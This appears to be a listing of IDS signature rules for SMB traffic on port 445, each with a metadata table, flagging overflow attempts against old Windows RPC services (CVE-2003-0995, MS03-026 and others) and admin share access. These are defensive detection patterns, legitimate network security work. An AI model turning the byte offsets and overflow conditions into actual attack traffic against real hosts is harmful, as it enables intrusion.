alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile unicode overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 01|"; within:2; distance:19; byte_test:4,>,256,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103186; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile unicode overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102468

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS D$ share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,!&,128,6,relative; byte_jump:2,34,little,relative; content:"D|24 00|"; distance:2; nocase; classtype:protocol-command-decode; sid:2102468; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS D$ share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102469

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS D$ unicode share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,&,128,6,relative; byte_jump:2,34,little,relative; content:"D|00 24 00 00 00|"; distance:2; nocase; classtype:protocol-command-decode; sid:2102469; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS D$ unicode share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103385

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IActivation bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103385; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IActivation bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103386

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IActivation little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103386; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IActivation little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103387

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IActivation unicode bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103387; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IActivation unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103388

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IActivation unicode little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103388; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IActivation unicode little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102465

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IPC$ share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,!&,128,6,relative; byte_jump:2,34,little,relative; content:"IPC|24 00|"; distance:2; nocase; flowbits:set,smb.tree.connect.ipc; classtype:protocol-command-decode; sid:2102465; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IPC$ share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102466

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IPC$ unicode share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,&,128,6,relative; byte_jump:2,34,little,relative; content:"I|00|P|00|C|00 24 00 00 00|"; distance:2; nocase; flowbits:set,smb.tree.connect.ipc; classtype:protocol-command-decode; sid:2102466; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IPC$ unicode share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103401

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS ISystemActivator bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103401; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS ISystemActivator bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103402

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS ISystemActivator little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103402; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS ISystemActivator little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103403

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS ISystemActivator unicode bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103403; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS ISystemActivator unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103404

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS ISystemActivator unicode little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103404; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS ISystemActivator unicode little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103264

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IrotIsRunning attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 02|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103264; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IrotIsRunning attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103265

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IrotIsRunning little endian attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|02 00|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103265; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IrotIsRunning little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103266

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IrotIsRunning unicode attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 02|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103266; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IrotIsRunning unicode attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103267

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IrotIsRunning unicode little endian attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|02 00|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103267; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IrotIsRunning unicode little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102948

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NDdeSetTrustedShareW little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0C 00|"; within:2; distance:19; isdataat:256,relative; content:!"|00|"; within:256; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102948; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NDdeSetTrustedShareW little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102939

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NDdeSetTrustedShareW unicode overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0C|"; within:2; distance:19; isdataat:512,relative; content:!"|00 00|"; within:512; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102939; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NDdeSetTrustedShareW unicode overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103024

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE unicode oversized Security Descriptor attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,&,128,6,relative; pcre:"/^.{27}/R"; content:"|01 00|"; within:2; distance:37; byte_jump:4,-15,little,relative,from_beginning; pcre:"/^.{4}/R"; byte_test:4,>,1024,36,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103024; rev:3; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE unicode oversized Security Descriptor attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 3

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103227

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS OpenKey little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0F 00|"; within:2; distance:19; byte_test:2,>,1024,20,relative,little; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103227; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS OpenKey little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103226

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS OpenKey overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0F|"; within:2; distance:19; byte_test:2,>,1024,20,relative; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103226; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS OpenKey overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103229

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS OpenKey unicode little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0F 00|"; within:2; distance:19; byte_test:2,>,2048,20,relative,little; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103229; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS OpenKey unicode little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103228

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS OpenKey unicode overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0F|"; within:2; distance:19; byte_test:2,>,2048,20,relative; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103228; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS OpenKey unicode overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103417

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS RemoteActivation attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6; classtype:protocol-command-decode; sid:2103417; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS RemoteActivation attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103418

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS RemoteActivation little endian attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6,little; classtype:protocol-command-decode; sid:2103418; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS RemoteActivation little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103419

